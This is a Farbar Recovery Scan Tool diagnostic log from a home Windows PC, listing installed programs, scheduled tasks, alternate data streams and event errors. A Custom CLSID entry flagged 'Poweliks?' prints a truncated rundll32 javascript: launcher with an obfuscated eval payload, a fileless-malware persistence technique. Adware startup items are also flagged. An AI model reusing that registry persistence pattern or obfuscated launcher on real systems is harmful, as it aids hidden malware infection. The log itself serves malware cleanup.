- Additional scan result of Farbar Recovery Scan Tool (x64) Version: 01-11-2014
- Ran by Owner at 2014-11-01 19:09:27
- Running from C:\Users\Owner\Desktop
- Boot Mode: Normal
- ==========================================================
- ==================== Security Center ========================
- (If an entry is included in the fixlist, it will be removed.)
- AV: Norton AntiVirus (Enabled - Up to date) {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
- AS: Norton AntiVirus (Enabled - Up to date) {631E4324-D31C-783F-EC5C-35AD42B18466}
- AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
- ==================== Installed Programs ======================
- (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
- 4500_G510gm_Help_Web (x32 Version: 000.0.440.000 - Hewlett-Packard) Hidden
- 4500G510gm_Software_Min (x32 Version: 000.0.423.000 - Hewlett-Packard) Hidden
- 4500G510gm_web (x32 Version: 000.0.425.000 - Hewlett-Packard) Hidden
- 64 Bit HP CIO Components Installer (Version: 6.2.1 - Hewlett-Packard) Hidden
- Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.189 - Adobe Systems Incorporated)
- Apple Application Support (HKLM-x32\...\{5D09C772-ECB3-442B-9CC6-B4341C78FDC2}) (Version: 2.3.4 - Apple Inc.)
- Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
- BufferChm (x32 Version: 130.0.331.000 - Hewlett-Packard) Hidden
- Corel Graphics - Windows Shell Extension (HKLM-x32\...\_{B6BFCD02-BA0E-41A9-9C9C-6624C4BB475F}) (Version: 15.2.0.686 - Corel Corporation)
- Corel Graphics - Windows Shell Extension (x32 Version: 15.2.686 - Corel Corporation) Hidden
- Corel Graphics - Windows Shell Extension 64 Bit (Version: 15.2.686 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - BR (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - Capture (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - Common (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - Connect (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - Custom Data (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - DE (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - Draw (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - EN (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - ES (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - Filters (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - FontNav (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - FR (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - IPM (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - IT (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - JP (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - PHOTO-PAINT (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - Photozoom Plugin (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - Redist (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - Setup Files (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - VBA (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - VideoBrowser (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - VSTA (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - WT (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW(R) Graphics Suite X5 (HKLM-x32\...\_{CE54DCE1-E00A-4D91-ACB9-A2D916C24051}) (Version: 15.2.0.686 - Corel Corporation)
- DriverUpdate (HKLM-x32\...\{850A14FC-F410-47F7-94E4-38F4D3F270D4}) (Version: 2.2.30452 - SlimWare Utilities, Inc.)
- Embrilliance version BriTon Leap Embrilliance 1.132 (HKLM\...\{CD06BE8E-4E09-4FC6-9098-94F0D6FE86F1}_is1) (Version: BriTon Leap Embrilliance 1.132 - BriTon Leap, Inc.)
- Embroidery Fonts Plus (HKLM-x32\...\{9E659749-F928-4D70-BFC0-AD504CCDA3C5}) (Version: 2.0.0000 - Soft Sight, Inc.)
- Ghostscript GPL 8.64 (Msi Setup) (HKLM-x32\...\_{06CD45E6-FF5E-4D8E-BC01-B276A90DADF2}) (Version: 8.64 - Corel Corporation)
- Ghostscript GPL 8.64 (Msi Setup) (x32 Version: 8.64 - Corel Corporation) Hidden
- Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.)
- Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
- HitmanPro 3.7 (HKLM\...\HitmanPro37) (Version: 3.7.9.232 - SurfRight B.V.)
- HP Officejet 4500 G510g-m (HKLM\...\{B38968E0-778F-47C3-8781-BAD4E497801C}) (Version: 13.0 - HP)
- Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1118 - Intel Corporation)
- Intel(R) Network Connections 15.6.25.0 (HKLM\...\PROSetDX) (Version: 15.6.25.0 - Intel)
- Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.2867 - Intel Corporation)
- Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.0.0.1046 - Intel Corporation)
- Java 7 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
- LG CyberLink Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.2.4009 - CyberLink Corp.)
- LG CyberLink Power2Go (x32 Version: 6.2.4009 - CyberLink Corp.) Hidden
- LG Power Tools (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 6.0.3316 - CyberLink Corp.)
- LG Power Tools (x32 Version: 6.0.3316 - CyberLink Corp.) Hidden
- Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
- Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
- Microsoft SQL Server 2005 (HKLM-x32\...\Microsoft SQL Server 2005) (Version: - Microsoft Corporation)
- Microsoft SQL Server Native Client (HKLM\...\{9ACF3FDB-C8E6-444C-8C64-13A221F7BFFD}) (Version: 9.00.5000.00 - Microsoft Corporation)
- Microsoft SQL Server Setup Support Files (English) (HKLM-x32\...\{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}) (Version: 9.00.5000.00 - Microsoft Corporation)
- Microsoft SQL Server VSS Writer (HKLM\...\{B636C9B9-A3F2-4DCE-ADCC-72E095018385}) (Version: 9.00.5000.00 - Microsoft Corporation)
- Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
- Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
- Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
- Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
- Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
- Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
- Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
- Microsoft Visual Studio Tools for Applications 2.0 - ENU (HKLM-x32\...\{AA4A4B2C-0465-3CF8-BA76-27A027D8ACAB}) (Version: 9.0.30729 - Microsoft Corporation)
- Microsoft Visual Studio Tools for Applications 2.0 Runtime (HKLM-x32\...\{299C0434-4F4E-341F-A916-4E07AEB35E79}) (Version: 9.0.30729 - Microsoft Corporation)
- MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
- MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
- MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
- Network64 (Version: 130.0.550.000 - Hewlett-Packard) Hidden
- Norton AntiVirus (HKLM-x32\...\NAV) (Version: 21.6.0.32 - Symantec Corporation)
- Norton Identity Safe (HKLM-x32\...\NST) (Version: 2014.7.8.23 - Symantec Corporation)
- Norton PC Checkup (HKLM-x32\...\Norton PC Checkup_is1) (Version: 3.0.2.122.0 - NortonLive Services)
- OpenOffice 4.0.0 (HKLM-x32\...\{55E61709-D7D4-43C0-B45D-BFAF5C09A02D}) (Version: 4.00.9702 - Apache Software Foundation)
- QuickTime (HKLM-x32\...\{B67BAFBA-4C9F-48FA-9496-933E3B255044}) (Version: 7.74.80.86 - Apple Inc.)
- QuickTime Free Download Packages (HKCU\...\QuickTime Free Download Packages) (Version: - ) <==== ATTENTION
- Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6215 - Realtek Semiconductor Corp.)
- Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{5442DAB8-7177-49E1-8B22-09A049EA5996}) (Version: 2.0.4.0 - Renesas Electronics Corporation)
- Renesas Electronics USB 3.0 Host Controller Driver (x32 Version: 2.0.4.0 - Renesas Electronics Corporation) Hidden
- Scan (x32 Version: 13.0.0.0 - Hewlett-Packard) Hidden
- Sentinel Protection Installer 7.6.1 (HKLM-x32\...\{7B1AA2AB-ACD2-45C7-B1B1-364BEA40615F}) (Version: 7.6.1 - SafeNet, Inc.)
- Strongvault Online Backup (HKLM-x32\...\{692EF506-1E15-4473-A829-ED951D6C49DB}) (Version: 2.0.0 - Strongvault) <==== ATTENTION
- swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
- Tajima DG/ML By Pulse 12 (HKLM-x32\...\InstallShield_{8A76F64A-1F32-4C9B-8B3A-FC92177069F3}) (Version: 12.1.3578 - Pulse Microsystems Ltd.)
- Tajima DG/ML By Pulse 12 (x32 Version: 12.1.3578 - Pulse Microsystems Ltd.) Hidden
- Tajima DGML By Pulse 14 (HKLM-x32\...\Tajima DGML By Pulse 14) (Version: 14.1.5367 - Pulse Microsystems Ltd.)
- Tajima DGML By Pulse 14 (x32 Version: 14.1.5367 - Pulse Microsystems Ltd.) Hidden
- Toolbox (x32 Version: 130.0.648.000 - Hewlett-Packard) Hidden
- WebReg (x32 Version: 130.0.132.017 - Hewlett-Packard) Hidden
- Yahoo! Software Update (HKLM-x32\...\Yahoo! Software Update) (Version: - )
- ==================== Custom CLSID (selected items): ==========================
- (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
- CustomCLSID: HKU\S-1-5-21-3808024246-114040771-358346857-1002_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
- ==================== Restore Points =========================
- 31-10-2014 03:12:43 Removed Adobe Reader XI (11.0.09).
- 31-10-2014 03:31:10 Configured PowerStarter
- 01-11-2014 22:38:15 Installed Java 7 Update 71
- 01-11-2014 23:46:33 Checkpoint by HitmanPro
- 01-11-2014 23:47:11 Checkpoint by HitmanPro
- ==================== Hosts content: ==========================
- (If needed Hosts: directive could be included in the fixlist to reset Hosts.)
- 2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____N C:\Windows\system32\Drivers\etc\hosts
- ==================== Scheduled Tasks (whitelisted) =============
- (If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
- Task: {19BCA226-20E9-472E-A717-9FC301ECB827} - System32\Tasks\Norton AntiVirus\Norton Error Analyzer => C:\Program Files (x86)\Norton AntiVirus\Engine\21.6.0.32\SymErr.exe [2014-01-30] (Symantec Corporation)
- Task: {266F5F6E-BF4D-47E8-8800-D2140AE5C318} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-11-01] (Google Inc.)
- Task: {3F3C7940-E49A-466F-BD28-DF18B2956EAA} - System32\Tasks\Test TimeTrigger => C:\Users\Owner\AppData\Local\Temp\Runner.exe <==== ATTENTION
- Task: {4F022BC7-D5D1-4F58-A3DD-71EC9BF0AA43} - System32\Tasks\Norton Identity Safe\Norton Error Analyzer => C:\Program Files (x86)\Norton Identity Safe\Engine\2014.7.8.23\SymErr.exe [2014-01-30] (Symantec Corporation)
- Task: {5EBC048E-97AC-4342-A37B-693E4DA56207} - System32\Tasks\Norton Identity Safe\Norton Error Processor => C:\Program Files (x86)\Norton Identity Safe\Engine\2014.7.8.23\SymErr.exe [2014-01-30] (Symantec Corporation)
- Task: {7E2BF364-8A5E-47FD-8E33-56A6B087CE64} - \BrowserSafeguard Update Task No Task File <==== ATTENTION
- Task: {891A1543-13F3-4228-833F-4F3D66FB00DD} - \ProgramRefresh-ATFST No Task File <==== ATTENTION
- Task: {8C1D3AAC-83CB-4ADE-B971-0CAE1B8E9EDB} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-11-01] (Google Inc.)
- Task: {9842888F-0BDA-48C4-B70E-5760B6A1329A} - System32\Tasks\DriverUpdate Startup => C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe [2013-06-22] (SlimWare Utilities, Inc.)
- Task: {9A086EE7-5ADA-4B0A-8416-4E20BAF32BA0} - System32\Tasks\Norton AntiVirus\Norton Error Processor => C:\Program Files (x86)\Norton AntiVirus\Engine\21.6.0.32\SymErr.exe [2014-01-30] (Symantec Corporation)
- Task: {9F3A4E80-BC48-44EB-8BB0-6587894DB816} - System32\Tasks\{107F41FE-AE6C-4845-BD94-D3084CE271EA} => Chrome.exe
- Task: {A0773E1F-B542-4055-BA16-2D1CD55B2881} - \ProgramUpdateCheck No Task File <==== ATTENTION
- Task: {A6CA6EAA-6579-4965-8911-E3269A9FBA65} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
- Task: {ACB05778-B525-4E9A-A1E4-3B20DEEAE4D5} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-11-01] (Adobe Systems Incorporated)
- Task: {B78A2B77-4A7E-47B0-B1A1-05518ED448DE} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton AntiVirus\Engine\21.6.0.32\WSCStub.exe [2014-09-21] (Symantec Corporation)
- Task: {CC1869E6-0CBD-4101-A577-B958D74DBFCF} - System32\Tasks\Microsoft\Windows\WindowsBackup\AutomaticBackup => Rundll32.exe /d sdengin2.dll,ExecuteScheduledBackup
- Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
- Task: C:\Windows\Tasks\DriverUpdate Startup.job => C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe
- Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
- Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
- ==================== Loaded Modules (whitelisted) =============
- 2012-10-10 02:22 - 2012-10-10 02:22 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
- 2009-12-15 13:46 - 2009-12-15 13:46 - 00619816 ____N () C:\Program Files (x86)\CyberLink\Power2Go\CLMediaLibrary.dll
- 2009-12-15 13:49 - 2009-12-15 13:49 - 00013096 ____N () C:\Program Files (x86)\CyberLink\Power2Go\CLMLSvcPS.dll
- 2009-07-13 16:03 - 2009-07-13 20:15 - 00364544 _____ () C:\Windows\SysWOW64\msjetoledb40.dll
- 2014-10-16 03:44 - 2014-10-16 03:44 - 00169472 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\ba8588c3319d63350220ec2ac3eb2c36\IsdiInterop.ni.dll
- 2013-01-11 11:21 - 2010-09-13 18:28 - 00058880 _____ () C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IsdiInterop.dll
- ==================== Alternate Data Streams (whitelisted) =========
- (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
- AlternateDataStreams: C:\ProgramData\Temp:373E1720
- AlternateDataStreams: C:\ProgramData\Temp:56E2E879
- AlternateDataStreams: C:\Users\Owner\Documents\craig1.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\craig1.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\craig2.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\craig2.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\craig3.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\craig3.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\craig4.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\craig4.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\Dad1.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\Dad1.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\Dad2.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\Dad2.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\Dad3.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\Dad3.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\ginibd.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\ginibd.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\graduation.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\graduation.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\IM1.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\IM1.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\IM2.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\IM2.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\IM3.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\IM3.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\IM4.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\IM4.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\LEXMG.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\LEXMG.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\M&G.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\M&G.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\Mardi Gras 1980.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\Mardi Gras 1980.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\pink dress.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\pink dress.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\Regency Hospital Company.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\Regency Hospital Company.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\Regency Hospital Company2.bmp:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\Regency Hospital Company2.bmp:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\rhc.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\rhc.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\s. vaccaro.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\s. vaccaro.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\TN logo.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\TN logo.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Yahoo!.website:TASKICON_0favicon-2079221766
- AlternateDataStreams: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Yahoo!.website:TASKICON_1favicon1313128964
- AlternateDataStreams: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Yahoo!.website:TASKICON_2favicon-2092717923
- ==================== Safe Mode (whitelisted) ===================
- (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
- HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\plsapp => ""="service"
- ==================== EXE Association (whitelisted) =============
- (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
- ==================== MSCONFIG/TASK MANAGER disabled items =========
- (Currently there is no automatic fix for this section.)
- MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^StrongVaultApp.exe.lnk => C:\Windows\pss\StrongVaultApp.exe.lnk.CommonStartup
- MSCONFIG\startupreg: CouponXplorer_5z Browser Plugin Loader 64 => C:\PROGRA~2\COUPON~2\bar\1.bin\5zbrmon64.exe
- MSCONFIG\startupreg: ShopAtHomeWatcher => C:\Users\Owner\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeWatcher.exe
- ========================= Accounts: ==========================
- Administrator (S-1-5-21-3808024246-114040771-358346857-500 - Administrator - Disabled)
- Guest (S-1-5-21-3808024246-114040771-358346857-501 - Limited - Disabled)
- HomeGroupUser$ (S-1-5-21-3808024246-114040771-358346857-1003 - Limited - Enabled)
- Owner (S-1-5-21-3808024246-114040771-358346857-1002 - Administrator - Enabled) => C:\Users\Owner
- ==================== Faulty Device Manager Devices =============
- Name: qknfd
- Description: qknfd
- Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
- Manufacturer:
- Service: qknfd
- Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
- Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
- Devices stay in this state if they have been prepared for removal.
- After you remove the device, this error disappears.Remove the device, and this error should be resolved.
- Name: Officejet 6700
- Description: Officejet 6700
- Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
- Manufacturer: HP
- Service:
- Problem: : This device is disabled. (Code 22)
- Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
- ==================== Event log errors: =========================
- Application errors:
- ==================
- Error: (11/01/2014 06:51:42 PM) (Source: WinMgmt) (EventID: 10) (User: )
- Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
- Error: (11/01/2014 06:50:38 PM) (Source: DesignSpooler) (EventID: 2) (User: NT AUTHORITY)
- Description: Pulse Design Spooler is shutting down. Security Device Error - Please attach your security device.
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x0000026c,SYSTEM\CurrentControlSet\Services\VSS\Diag\VssvcPublisher,0,REG_BINARY,0000000002D2EB10.72). hr = 0x80070005, Access is denied.
- .
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000d78,(null),0,REG_BINARY,00000000098FDD30.72). hr = 0x80070005, Access is denied.
- .
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {cd3f2362-8bef-46c7-9181-d62844cdc0b2}
- Writer Name: MSSearch Service Writer
- Writer Instance ID: {14ce3ae3-8162-40cd-a0d5-a852f74bd3aa}
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000d78,(null),0,REG_BINARY,00000000098FDD30.72). hr = 0x80070005, Access is denied.
- .
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {cd3f2362-8bef-46c7-9181-d62844cdc0b2}
- Writer Name: MSSearch Service Writer
- Writer Instance ID: {14ce3ae3-8162-40cd-a0d5-a852f74bd3aa}
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000644,(null),0,REG_BINARY,0000000002BEE180.72). hr = 0x80070005, Access is denied.
- .
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0}
- Writer Name: WMI Writer
- Writer Instance ID: {357e23c8-7333-4443-8351-b9c96a4ce42d}
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x000001ec,(null),0,REG_BINARY,0000000002AFEA00.72). hr = 0x80070005, Access is denied.
- .
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f}
- Writer Name: Shadow Copy Optimization Writer
- Writer Instance ID: {043545d9-2944-4e8f-8adc-a463570ed7f2}
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x000001b0,(null),0,REG_BINARY,0000000002B7EAD0.72). hr = 0x80070005, Access is denied.
- .
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {afbab4a2-367d-4d15-a586-71dbb18f8485}
- Writer Name: Registry Writer
- Writer Instance ID: {d09007ad-61ae-428d-a929-788a5b790395}
